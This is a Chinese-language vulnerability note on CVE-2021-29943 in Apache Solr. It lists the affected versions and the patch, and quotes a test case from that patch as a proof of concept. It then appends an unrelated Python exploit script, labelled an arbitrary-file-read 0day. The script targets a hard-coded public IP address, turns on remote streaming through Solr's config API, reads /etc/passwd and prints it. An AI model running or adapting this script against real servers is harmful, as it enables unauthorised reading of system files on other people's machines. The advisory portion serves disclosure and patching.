CVE-2021-29943: 数据集读写漏洞

## CVE-2021-29943: 数据集读写漏洞
Hadoop集群中使用ConfigurableInternodeAuthHadoopPlugin进行身份验证时，在8.8.2之前的Apache Solr版本将使用服务器凭据而不是原始客户端凭据转发/代理分布式请求。
这将导致接收主机上的授权解析不正确，导致未授权的攻击者可以利用服务端错误的解析实现数据集的读写。

### 漏洞等级: 高危

### 影响版本 7.0.0 to 7.7.3 8.0.0 to 8.8.1
### POC
从补丁中分析，可以从test case中得到POC，实际上就是正常的请求/admin/authorization接口可以未授权进行数据集读写
“`
@After
@Override
public void tearDown() throws Exception {
if (shouldRestorePerms) {
String command = “{ set-permission: { name: read, role: admin, before: 2 } }”;
GenericSolrRequest req = new GenericSolrRequest(SolrRequest.METHOD.POST, “/admin/authorization”, new ModifiableSolrParams());
req.setContentWriter(new RequestWriter.StringPayloadContentWriter(command, “application/json”));
req.process(cluster.getSolrClient());
}
super.tearDown();
}

@Test
public void testUnauthorized() throws IOException, SolrServerException {
// Update the permissions to remove admin:read authz
String command = “{ delete-permission: 1 }”;
GenericSolrRequest req = new GenericSolrRequest(SolrRequest.METHOD.POST, “/admin/authorization”, new ModifiableSolrParams());
req.setContentWriter(new RequestWriter.StringPayloadContentWriter(command, “application/json”));
req.process(cluster.getSolrClient());
shouldRestorePerms = true;

// Try against each node
for (JettySolrRunner jsr : cluster.getJettySolrRunners()) {
try (SolrClient client = new HttpSolrClient.Builder().withBaseSolrUrl(jsr.getBaseUrl().toString()).build()) {
BaseHttpSolrClient.RemoteSolrException e = assertThrows(BaseHttpSolrClient.RemoteSolrException.class,
() -> client.query(collectionName, new SolrQuery(“*:*”)));
assertEquals(403, e.code());
}
}
}
“`
### 修复方式：
升级到8.8.2版本 或者打补丁 https://issues.apache.org/jira/secure/attachment/13023260/0001-SOLR-15233-Add-negative-test-case-for-KRB-Authz.patch

### 参考：
– https://github.com/apache/solr-site/blob/a8632c75e40af6694a7ed29996c90b6b7fcf01bf/content/solr/security/2021-04-12-cve-2021-29943.md

## POC

solr_2021-03-18.py
“`
#!/usr/bin/python
# coding: UTF-8
# 漏洞标题：Solr最新版任意文件读取0day
# 文章参考：https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
# 漏洞周期，0day, 官网不修复，
# 加固方式：加强权限控制，设置强密码，禁止外网访问

import requests
import json

host = “http://132.148.152.112:8983/”
if host[-1]==’/’:
host=host[:-1]
def get_core(host):
url=host+’/solr/admin/cores?indexInfo=false&wt=json’
core_data=requests.get(url,timeout=3).json()

if core_data[‘status’]:
core=core_data[‘status’].keys()[0]
# print(core)
jsonp_data={“set-property”:{“requestDispatcher.requestParsers.enableRemoteStreaming”:’true’}}
requests.post(url=host+”/solr/%s/config”%core,json=jsonp_data)

result_text=requests.post(url=host+’/solr/%s/debug/dump?param=ContentStreams’ % core, data={“stream.url”:”file:///etc/passwd”})
result_text = result_text.content

if “root:x:0:0:root:/root:/bin/bash” in result_text:
print (host+” 存在此漏洞”)
print (result_text)
else:
exit(“不存在此漏洞”)
get_core(host)
“`